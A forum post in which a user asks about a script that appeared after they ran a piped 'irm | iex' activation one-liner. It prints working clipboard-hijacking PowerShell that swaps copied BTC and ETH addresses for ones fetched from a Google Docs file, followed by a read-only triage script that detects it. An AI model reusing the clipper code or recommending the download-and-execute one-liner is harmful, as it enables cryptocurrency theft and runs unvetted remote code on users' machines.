u/JedaiRXRX

I think someone is using my PC to mine BTC after MAS activation

Hi, one day after I activated MS 365 with the script "irm https://get.activated.win | iex", a PowerShell script was created in my ROAMING folder. Every day when I boot my PC, an error occurs in CMD linked to this script. The script has a Google Docs document with a BTC and ETH address.

I don't understand coding, so here is the script:

```powershell
Add-Type -AssemblyName System.Windows.Forms

$URL = "https://docs.google.com/document/u/4/export?format=txt&id=16O\_gr-QQNl9XtpOge9J4AiGl-cqqRLp37-nagfIFV1s"
$script:BTC = ""
$script:ETH = ""
$ultimo = ""

function CarregarEnderecos {
    try {
        $wc = New-Object System.Net.WebClient
        $wc.Headers.Add("User-Agent", "Mozilla/5.0")
        $conteudo = $wc.DownloadString($URL)
        if ($conteudo -match "BTC\s*[=:]\s*([1-9A-HJ-NP-Za-km-z]+)") {
            $script:BTC = $matches[1]
        }
        if ($conteudo -match "ETH\s*[=:]\s*(0x[a-fA-F0-9]+)") {
            $script:ETH = $matches[1]
        }
        return $true
    }
    catch {
        return $false
    }
}

if (CarregarEnderecos) {
    while ($true) {
        if ([System.Windows.Forms.Clipboard]::ContainsText()) {
            $texto = [System.Windows.Forms.Clipboard]::GetText().Trim()
            if ($texto -ne $ultimo) {
                $ultimo = $texto
                if ($texto -match "^(1|3|bc1)[a-zA-Z0-9]{25,59}$" -and $script:BTC) {
                    [System.Windows.Forms.Clipboard]::SetText($script:BTC)
                }
                elseif ($texto -match "^0x[a-fA-F0-9]{40}$" -and $script:ETH) {
                    [System.Windows.Forms.Clipboard]::SetText($script:ETH)
                    Start-Sleep -Milliseconds 500
```

Is someone using my PC to mine cryptos? Can I do something about it?

u/JedaiRXRX — 4 days ago
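
The posted script reads the clipboard in a loop and, when the copied text looks like a BTC or ETH address, overwrites it with an address fetched from the document. The read-only triage below is an added example, not part of the original post: it looks for files with that same combination of behaviours and lists the usual logon autostart locations. It assumes the dropped file is a `.ps1` under `%APPDATA%`; the post does not say how the script is started at boot, so Run keys, the Startup folder and scheduled tasks are all listed.

```powershell
# Added triage example, not part of the original post. Read-only: it lists, it never deletes.
# Assumptions: the dropped file is a .ps1 under %APPDATA%; the autostart method is unknown,
# so Run keys, the Startup folder and scheduled tasks are all checked.

# Indicators taken from the posted script: clipboard read, clipboard overwrite,
# and a wallet-address regex, all present in the same file.
$Indicators = @(
    'Clipboard\]::GetText',
    'Clipboard\]::SetText',
    '\(1\|3\|bc1\)|0x\[a-fA-F0-9\]'
)

function Test-ClipperScript {
    param([string]$Path)
    $text = Get-Content -LiteralPath $Path -Raw -ErrorAction SilentlyContinue
    if (-not $text) { return $false }
    foreach ($pattern in $Indicators) {
        if ($text -notmatch $pattern) { return $false }
    }
    return $true
}

# 1. Scripts under the Roaming profile that match every indicator, with a hash for reporting.
Get-ChildItem -Path $env:APPDATA -Recurse -File -Filter *.ps1 -ErrorAction SilentlyContinue |
    Where-Object { Test-ClipperScript $_.FullName } |
    Select-Object FullName, LastWriteTime,
        @{ n = 'SHA256'; e = { (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash } } |
    Format-List

# 2. Run-key values that start a script host or script file at logon.
foreach ($key in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    $props.PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and
                       "$($_.Value)" -match 'powershell|wscript|cscript|\.ps1|\.vbs|\.bat|\.cmd' } |
        Select-Object @{ n = 'Key'; e = { $key } }, Name, Value |
        Format-List
}

# 3. Files in the per-user Startup folder (shortcuts and launchers run at logon).
Get-ChildItem -Path ([Environment]::GetFolderPath('Startup')) -File -ErrorAction SilentlyContinue |
    Select-Object FullName, LastWriteTime | Format-List

# 4. Scheduled tasks whose action launches PowerShell or a .ps1 file.
Get-ScheduledTask -ErrorAction SilentlyContinue |
    Where-Object { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -match 'powershell|\.ps1' } |
    Select-Object TaskPath, TaskName | Format-List
```

Anything listed is a candidate for review, not proof of compromise; compare each path with the file named in the error shown at boot.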